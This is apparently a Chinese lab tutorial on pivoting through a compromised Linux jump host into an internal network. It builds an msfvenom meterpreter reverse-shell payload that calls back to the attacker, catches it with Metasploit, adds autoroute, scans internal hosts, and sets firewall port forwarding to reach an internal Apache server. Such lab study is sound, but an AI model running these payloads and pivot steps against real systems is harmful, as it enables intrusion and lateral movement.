内网攻击跳板机为Linux

  • 攻击机 Kali 192.168.114.62
  • 跳板机 Linux 192.168.114.84 10.10.10.200
    TYPE=Ethernet
    PROXY_METHOD=none
    BROWSER_ONLY=no
    BOOTPROTO=static
    DEFROUTE=yes
    IPV4_FAILURE_FATAL=no
    IPV6INIT=yes
    IPV6_AUTOCONF=yes
    IPV6_DEFROUTE=yes
    IPV6_FAILURE_FATAL=no
    IPV6_ADDR_GEN_MODE=stable-privacy
    NAME=ens36
    DEVICE=ens36
    ONBOOT=yes
    IPADDR="10.10.10.200"
    NETMASK="255.255.255.0"
    GATEWAY="10.10.10.1"   #如果添加网卡出错,可以手动配置

  • 内网机 2003 server 10.10.10.136
  • 生成对应的payload
    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.114.62 LPORT=8888 -f elf > /tmp/msfshell.elf  #针对linux跳板机生成木马

  • 进入msf
    use exploit/multi/handler
    设置选项,进行监听

  • 监听成功

 

  • 进行路由查看
    run get_local_subnets 查看目标主机的路由情况
    发现目标有两个网段
    run post/multi/manage/autoroute  自动添加木马所在主机上的所有路由
    run autoroute -p 查看添加的路由

  • 添加成功

  • 进行ip扫描,试探内部有哪些主机存活
    将木马挂起
    auxiliary/scanner/discovery/udp_sweep  切换探测存活主机

     

  • 根据存活ip,进行端口扫描
  • 根据已经存在的端口,进行一个基础探测
    use auxiliary/scanner/http/http_version  #探测80端口
    10.10.10.136:80 Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45

  • 使用端口转发进行访问
    使用shell,进入
    echo "1" > /proc/sys/net/ipv4/ip_forward  #开启端口转发
    
    firewall-cmd --add-masquerade #开启IP伪装
    
    firewall-cmd --add-forward-port=port=1060:proto=tcp:toaddr=10.10.10.136:toport=80

     

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值